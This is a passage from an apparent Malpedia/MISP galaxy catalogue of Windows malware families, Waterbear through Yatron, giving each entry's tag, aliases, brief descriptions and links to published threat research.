https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf
https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf
https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html
https://www.bbc.com/news/world-us-canada-53195749
https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/

Waterbear

Waterbear, also known as DbgPrint in its earlier export function, has been active since 2009. The malware is presumably developed by the BlackTech APT group and adopts advanced anti-analysis and forward-thinking design. These designs include a sophisticated shellcode stager, the ability to load plugins on-the-fly, and overall evasiveness should the C2 server fail to respond with a valid session key.

The tag is: misp-galaxy:malpedia="Waterbear"

Waterbear is also known as:

DbgPrint
EYEWELL

Table 2891. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.waterbear
https://www.youtube.com/watch?v=6SDdUVejR2w
https://www.zdnet.com/article/waterbear-malware-used-in-attack-wave-against-government-agencies/
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf
https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/
https://daydaynews.cc/zh-tw/technology/297265.html
https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html
https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf

WaterMiner

The tag is: misp-galaxy:malpedia="WaterMiner"

WaterMiner is also known as:

Table 2892. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer
https://blog.minerva-labs.com/waterminer-a-new-evasive-crypto-miner

WaterSpout

The tag is: misp-galaxy:malpedia="WaterSpout"

WaterSpout is also known as:

Table 2893. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout
https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

WebC2-AdSpace

The tag is: misp-galaxy:malpedia="WebC2-AdSpace"

WebC2-AdSpace is also known as:

Table 2894. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

WebC2-Ausov

The tag is: misp-galaxy:malpedia="WebC2-Ausov"

WebC2-Ausov is also known as:

Table 2895. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

WebC2-Bolid

The tag is: misp-galaxy:malpedia="WebC2-Bolid"

WebC2-Bolid is also known as:

Table 2896. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

WebC2-Cson

The tag is: misp-galaxy:malpedia="WebC2-Cson"

WebC2-Cson is also known as:

Table 2897. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

WebC2-DIV

The tag is: misp-galaxy:malpedia="WebC2-DIV"

WebC2-DIV is also known as:

Table 2898. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

WebC2-GreenCat

The tag is: misp-galaxy:malpedia="WebC2-GreenCat"

WebC2-GreenCat is also known as:

Table 2899. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

WebC2-Head

The tag is: misp-galaxy:malpedia="WebC2-Head"

WebC2-Head is also known as:

Table 2900. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

WebC2-Kt3

The tag is: misp-galaxy:malpedia="WebC2-Kt3"

WebC2-Kt3 is also known as:

Table 2901. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

WebC2-Qbp

The tag is: misp-galaxy:malpedia="WebC2-Qbp"

WebC2-Qbp is also known as:

Table 2902. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

WebC2-Rave

The tag is: misp-galaxy:malpedia="WebC2-Rave"

WebC2-Rave is also known as:

Table 2903. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

WebC2-Table

The tag is: misp-galaxy:malpedia="WebC2-Table"

WebC2-Table is also known as:

Table 2904. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

WebC2-UGX

The tag is: misp-galaxy:malpedia="WebC2-UGX"

WebC2-UGX is also known as:

Table 2905. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

WebC2-Yahoo

The tag is: misp-galaxy:malpedia="WebC2-Yahoo"

WebC2-Yahoo is also known as:

Table 2906. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

WebMonitor RAT

On its website, Webmonitor RAT is described as 'a very powerful, user-friendly, easy-to-setup and state-of-the-art monitoring tool. Webmonitor is a fully native RAT, meaning it will run on all Windows versions and languages starting from Windows XP and up, and perfectly compatible with all crypters and protectors.' Unit42 notes in their analysis that it is offered as C2-as-a-service and raises the controversial aspect that the builder allows to create client binaries that will not show any popup or dialogue during installation or while running on a target system.

The tag is: misp-galaxy:malpedia="WebMonitor RAT"

WebMonitor RAT is also known as:

RevCode

Table 2907. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor
https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-actors-target-comm-apps-such-as-zoom-slack-discord
https://revcode.se/product/webmonitor/
https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/
https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/

WeControl

The tag is: misp-galaxy:malpedia="WeControl"

WeControl is also known as:

Table 2908. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.wecontrol
https://unit42.paloaltonetworks.com/westeal/

WellMess

WellMess is A Remote Access Trojan written in GoLang and .NET. It has hard-coded User-Agents. Attackers deploy WellMess using separate tools which also allow lateral movement, for example "gost". Command and Control traffic is handled via HTTP using the Set-Cookie field and message body.

The tag is: misp-galaxy:malpedia="WellMess"

WellMess is also known as:

Table 2909. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess
https://us-cert.cisa.gov/ncas/alerts/aa21-116a
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b
https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf
https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf
https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html
https://securelist.com/apt-trends-report-q2-2020/97937/
https://community.riskiq.com/article/541a465f/description
https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf
https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors
https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html
https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf
https://blog.talosintelligence.com/2020/08/attribution-puzzle.html
https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf

WeSteal

The tag is: misp-galaxy:malpedia="WeSteal"

WeSteal is also known as:

Table 2910. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.westeal
https://unit42.paloaltonetworks.com/westeal/

WhiteBird

According to Dr.Web, WhiteBird is a backdoor written in C++ and designed to operate in both 32-bit and 64-bit Microsoft Windows operating systems. The configuration is encrypted with a single byte XOR key. An interesting feature is that the malware can be restricted to operate only within certain "working_hours" with a granularity of one minute.

The tag is: misp-galaxy:malpedia="WhiteBird"

WhiteBird is also known as:

Table 2911. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.whitebird
https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf
https://st.drweb.com/static/new-www/news/2020/september/tek_rf_article_en.pdf

WildFire

The tag is: misp-galaxy:malpedia="WildFire"

WildFire is also known as:

Table 2912. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire

winlog

The tag is: misp-galaxy:malpedia="winlog"

winlog is also known as:

Table 2913. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.winlog
https://github.com/Thibault-69/Keylogger-Windows-----WinLog

WinMM

The tag is: misp-galaxy:malpedia="WinMM"

WinMM is also known as:

Table 2914. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm
https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf
https://securelist.com/analysis/publications/69953/the-naikon-apt/
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Winnti (Windows)

The tag is: misp-galaxy:malpedia="Winnti (Windows)"

Winnti (Windows) is also known as:

BleDoor
JUMPALL
Pasteboy
RbDoor

Table 2915. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti
https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/
https://www.youtube.com/watch?v=_fstHQSK-kk
https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/
http://2015.ruxcon.org.au/assets/2015/slides/Ruxcon%202015%20-%20McCormack.pdf
https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/
https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/
https://www.tagesschau.de/investigativ/ndr/hackerangriff-chemieunternehmen-101.html
https://securelist.com/games-are-over/70991/
https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf
https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf
https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html
https://github.com/TKCERT/winnti-suricata-lua
https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/
http://web.br.de/interaktiv/winnti/english/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf
https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/
http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf
https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf
https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape
https://www.fireeye.com/blog/threat-research/2021/01/emulation-of-kernel-mode-rootkits-with-speakeasy.html
https://www.carbonblack.com/2020/02/20/threat-analysis-active-c2-discovery-using-protocol-emulation-part2-winnti-4-0/
https://securelist.com/apt-trends-report-q3-2020/99204/
http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/
https://github.com/TKCERT/winnti-detector
https://github.com/superkhung/winnti-sniff
https://content.fireeye.com/apt-41/rpt-apt41/
https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf
https://content.fireeye.com/api/pdfproxy?id=86840
https://github.com/br-data/2019-winnti-analyse/
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://github.com/TKCERT/winnti-nmap-script
https://go.recordedfuture.com/hubfs/reports/cta-2021-0921.pdf
https://www.lastline.com/labsblog/helo-winnti-attack-scan/
https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf
https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/
https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/
https://docplayer.net/162112338-Don-t-miss-the-forest-for-the-trees-gleaning-hunting-value-from-too-much-intrusion-data.html
https://www.secureworks.com/research/threat-profiles/bronze-atlas
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage

WinPot

WinPot is created to make ATMs by a popular ATM vendor to automatically dispense all cash from their most valuable cassettes.

The tag is: misp-galaxy:malpedia="WinPot"

WinPot is also known as:

ATMPot

Table 2916. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot
https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/
https://securelist.com/atm-robber-winpot/89611/
https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/

Winsloader

The tag is: misp-galaxy:malpedia="Winsloader"

Winsloader is also known as:

Table 2917. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader
http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

Wipbot

The tag is: misp-galaxy:malpedia="Wipbot"

Wipbot is also known as:

Epic
Tavdig

Table 2918. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot
https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf
https://securelist.com/analysis/publications/65545/the-epic-turla-operation/
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf
https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf

WMI Ghost

The tag is: misp-galaxy:malpedia="WMI Ghost"

WMI Ghost is also known as:

Syndicasec
Wimmie

Table 2919. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost
https://secrary.com/ReversingMalware/WMIGhost/
https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets

WndTest

The tag is: misp-galaxy:malpedia="WndTest"

WndTest is also known as:

Table 2920. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest
https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

Wonknu

The tag is: misp-galaxy:malpedia="Wonknu"

Wonknu is also known as:

Table 2921. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu

woody

The tag is: misp-galaxy:malpedia="woody"

woody is also known as:

Table 2922. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.woody
https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814

Woolger

The tag is: misp-galaxy:malpedia="Woolger"

Woolger is also known as:

WoolenLogger

Table 2923. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger
http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf
https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf

WORMHOLE

WORMHOLE is a TCP tunneler that is dynamically configurable from a C&C server and can communicate with an additional remote machine endpoint for a relay.

The tag is: misp-galaxy:malpedia="WORMHOLE"

WORMHOLE is also known as:

Table 2924. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole
https://content.fireeye.com/apt/rpt-apt38
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf

WormLocker

The tag is: misp-galaxy:malpedia="WormLocker"

WormLocker is also known as:

WormLckr

Table 2925. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.wormlocker
https://twitter.com/Kangxiaopao/status/1355056807924797440

WpBruteBot

The tag is: misp-galaxy:malpedia="WpBruteBot"

WpBruteBot is also known as:

Table 2926. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.wpbrutebot
https://www.zscaler.com/blogs/security-research/malware-leveraging-xml-rpc-vulnerability-exploit-wordpress-sites

WSCSPL

The tag is: misp-galaxy:malpedia="WSCSPL"

WSCSPL is also known as:

Table 2927. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl
https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/

x4

The tag is: misp-galaxy:malpedia="x4"

x4 is also known as:

Table 2928. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.x4
https://www.gradiant.org/noticia/analysis-malware-cve-2017/

X-Agent (Windows)

The tag is: misp-galaxy:malpedia="X-Agent (Windows)"

X-Agent (Windows) is also known as:

chopstick
splm

Table 2929. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent
https://assets.documentcloud.org/documents/3461560/Google-Aquarium-Clean.pdf
https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government
https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf
https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
https://securelist.com/apt-trends-report-q2-2020/97937/
https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf
https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html
http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf
http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf
https://www.secureworks.com/research/threat-profiles/iron-twilight
https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf

XBot POS

The tag is: misp-galaxy:malpedia="XBot POS"

XBot POS is also known as:

Table 2930. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos
https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html

XBTL

The tag is: misp-galaxy:malpedia="XBTL"

XBTL is also known as:

Table 2931. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl

xCaon

Checkpoint Research found this backdoor, attributed to IndigoZebra, used to target Afghan and other Central-Asia countries, including Kyrgyzstan and Uzbekistan, since at least 2014.

The tag is: misp-galaxy:malpedia="xCaon"

xCaon is also known as:

Table 2932. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xcaon
https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/

XDSpy

According to ESET Research, XDDown is a primary malware component and is strictly a downloader. It persists on the system using the traditional Run key. It downloads additional plugins from the hardcoded C&C server using the HTTP protocol. The HTTP replies contain PE binaries encrypted with a hardcoded two-byte XOR key. Plugins include a module for reconnaissance on the affected system, crawling drives, file exfiltration, SSID gathering, and grabbing saved passwords.

The tag is: misp-galaxy:malpedia="XDSpy"

XDSpy is also known as:

Table 2933. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy
https://vblocalhost.com/uploads/VB2020-Faou-Labelle.pdf
https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/
https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf
https://github.com/eset/malware-ioc/tree/master/xdspy/

Xenon Stealer

The tag is: misp-galaxy:malpedia="Xenon Stealer"

Xenon Stealer is also known as:

Table 2934. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xenon
https://twitter.com/3xp0rtblog/status/1331974232192987142

XFSADM

The tag is: misp-galaxy:malpedia="XFSADM"

XFSADM is also known as:

Table 2935. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xfsadm
https://twitter.com/VK_Intel/status/1149454961740255232
https://twitter.com/r3c0nst/status/1149043362244308992

XFSCashNCR

The tag is: misp-galaxy:malpedia="XFSCashNCR"

XFSCashNCR is also known as:

Table 2936. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xfscashncr
https://blog.cyttek.com/2019/08/28/other-day-other-malware-in-the-way-died-exe/
https://twitter.com/r3c0nst/status/1166773324548063232

XiaoBa

Ransomware.

The tag is: misp-galaxy:malpedia="XiaoBa"

XiaoBa is also known as:

FlyStudio

Table 2937. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xiaoba
https://id-ransomware.blogspot.com/2017/10/xiaoba-ransomware.html

XP10

Ransomware.

The tag is: misp-galaxy:malpedia="XP10"

XP10 is also known as:

FakeChrome Ransomware

Table 2938. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xp10
https://id-ransomware.blogspot.com/2020/08/xp10-ransomware.html

Xpan

The tag is: misp-galaxy:malpedia="Xpan"

Xpan is also known as:

Table 2939. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan
https://securelist.com/blog/research/78110/xpan-i-am-your-father/
https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/

XPCTRA

Incorporates code of Quasar RAT.

The tag is: misp-galaxy:malpedia="XPCTRA"

XPCTRA is also known as:

Expectra

Table 2940. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra
https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html
https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/
https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis

XpertRAT

The tag is: misp-galaxy:malpedia="XpertRAT"

XpertRAT is also known as:

Table 2941. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat
https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html
https://labs.k7computing.com/?p=15672
https://www.veronicavaleros.com/blog/2018/3/12/a-study-of-rats-third-timeline-iteration

XP PrivEsc (CVE-2014-4076)

The tag is: misp-galaxy:malpedia="XP PrivEsc (CVE-2014-4076)"

XP PrivEsc (CVE-2014-4076) is also known as:

Table 2942. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xp_privesc
https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf

XServer

The tag is: misp-galaxy:malpedia="XServer"

XServer is also known as:

Filesnfer

Table 2943. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xserver
https://norfolkinfosec.com/filesnfer-tool-c-python/
https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf

xsPlus

The tag is: misp-galaxy:malpedia="xsPlus"

xsPlus is also known as:

nokian

Table 2944. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus
https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf
https://securelist.com/analysis/publications/69953/the-naikon-apt/
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

XTunnel

X-Tunnel is a network proxy tool that implements a custom network protocol encapsulated in the TLS protocol.

The tag is: misp-galaxy:malpedia="XTunnel"

XTunnel is also known as:

Shunnael
X-Tunnel
xaps

Table 2945. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel
https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/
https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf
https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government
https://www.symantec.com/blogs/election-security/apt28-espionage-military-government
https://securelist.com/big-threats-using-code-similarity-part-1/97239/
https://securelist.com/apt-trends-report-q2-2020/97937/
http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf
https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html
https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
https://www.secureworks.com/research/threat-profiles/iron-twilight
http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf
https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf

X-Tunnel (.NET)

This is a rewrite of win.xtunnel using the .NET framework that surfaced late 2017.

The tag is: misp-galaxy:malpedia="X-Tunnel (.NET)"

X-Tunnel (.NET) is also known as:

Table 2946. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel_net
https://www.ncsc.gov.uk/alerts/indicators-compromise-malware-used-apt28

Xwo

In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it “Xwo” - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.

The tag is: misp-galaxy:malpedia="Xwo"

Xwo is also known as:

Table 2947. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo
https://www.alienvault.com/blogs/labs-research/xwo-a-python-based-bot-scanner

xxmm

The tag is: misp-galaxy:malpedia="xxmm"

xxmm is also known as:

ShadowWalker

Table 2948. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm
https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses
https://jsac.jpcert.or.jp/archive/2019/pdf/JSAC2019_8_nakatsuru_en.pdf
https://www.cybereason.com/blog/labs-shadowwali-new-variant-of-the-xxmm-family-of-backdoors
https://www.macnica.net/mpressioncss/feature_05.html/
http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/
https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf
https://www.secureworks.com/research/threat-profiles/bronze-butler

Yahoyah

The tag is: misp-galaxy:malpedia="Yahoyah"

Yahoyah is also known as:

KeyBoy

Table 2949. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah
http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

Yakuza

Ransomware.

The tag is: misp-galaxy:malpedia="Yakuza"

Yakuza is also known as:

Teslarvng Ransomware

Table 2950. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.yakuza_ransomware
https://id-ransomware.blogspot.com/2020/03/teslarvng-ransomware.html

Yarraq

Yarraq is a ransomware that encrypts files by using asymmetric keys and adding '.yarraq' as extension to the end of filenames. At the time of writing the attacker asks for $2000 ransom in order to provide a decryptor, to enable victims to restore their original files back. To communicate with the attacker the email: cyborgyarraq@protonmail.ch is provided.

The tag is: misp-galaxy:malpedia="Yarraq"

Yarraq is also known as:

Table 2951. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.yarraq
https://yomi.yoroi.company/report/5e1d7b06c21640608183de58/5e1d7b09d1cc4993da62f261/overview
https://twitter.com/GrujaRS/status/1210541690349662209

Yatron

The tag is: misp-galaxy:malpedia="Yatron"

Yatron is also known as:

Table 2952. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.yatron
https://securelist.com/ransomware-two-pieces-of-good-news/93355/

yayih

